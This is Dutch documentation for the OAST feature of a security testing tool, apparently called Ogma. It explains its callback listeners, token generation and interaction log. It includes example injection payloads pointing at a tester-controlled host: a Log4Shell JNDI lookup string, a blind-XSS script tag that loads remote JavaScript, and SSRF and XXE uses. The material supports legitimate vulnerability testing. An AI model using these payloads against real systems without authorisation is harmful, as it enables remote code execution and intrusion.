Ga naar de inhoud

OAST ​

OAST (Out-of-Band Application Security Testing) detecteert kwetsbaarheden die geen zichtbaar antwoord opleveren. In plaats daarvan maakt het doel een uitgaande verbinding met een listener die jij beheert, waarmee het probleem wordt bevestigd.

Hoe het werkt ​

Ogma voert lokale listeners uit voor meerdere protocollen. Wanneer een doelapplicatie contact maakt met een van deze listeners, wordt de interactie vastgelegd met het bron-IP-adres, de tijdstempel, de ontvangen gegevens en het geïnjecteerde token.

Listenerprotocollen ​

ProtocolStandaardpoortToepassing
HTTPConfigureerbaarSSRF, blinde XSS, webhooks
HTTPSConfigureerbaarSSRF via TLS
DNSConfigureerbaarBlinde injectie, XXE, log4shell
SMTPConfigureerbaarE-mailheaderinjectie, SSRF naar maildiensten

Configureer de listenerpoorten en de domeinnaam voor gegenereerde tokens in het OAST-instellingenpaneel.

Een callbacktoken genereren ​

  1. Open Hulpprogramma's > OAST.
  2. Klik op + Nieuw en vervolgens op Aanmaken. Elk token is uniek voor een test.
  3. Kopieer het token. Het bevat je listenerdomein en een unieke identificatie, zodat interacties aan de specifieke test kunnen worden gekoppeld.

Voorbeeld van het tokenformaat: [unique-id].[your-oast-domain]

Tokens in payloads gebruiken ​

Injecteer het callbacktoken in elk veld waarin de applicatie een uitgaande verbinding zou kunnen maken:

  • SSRF: gebruik het HTTP-/HTTPS-token als doel-URL: https://[token]/
  • XXE: verwijs naar het token in een DOCTYPE of URL van een externe entiteit.
  • Log4Shell: neem het op in een header: ${jndi:ldap://[token]/a}
  • Blinde XSS: injecteer het als script-src: <script src="https://[token]/x.js"></script>
  • SMTP-injectie: gebruik het als bestemmingsadres of URL in e-mailheaders.

Interactielogboek ​

Het interactiepaneel toont elke ontvangen callback:

KolomBeschrijving
TijdWanneer de interactie is ontvangen
ProtocolHTTP, HTTPS, DNS of SMTP
Bron-IPIP-adres dat de verbinding heeft gemaakt
TokenMet welk token contact is gemaakt
GegevensVerzoekpad, DNS-querynaam of SMTP-gegevens

Klik op een rij om de volledige interactiedetails te bekijken, inclusief verzoekheaders en body waar van toepassing.

Interacties aan tests koppelen ​

Omdat elk token uniek is, kun je verschillende tokens in verschillende parameters of verzoeken injecteren en precies bepalen welk injectiepunt de callback heeft veroorzaakt.

Propriëtaire software. Alle rechten voorbehouden.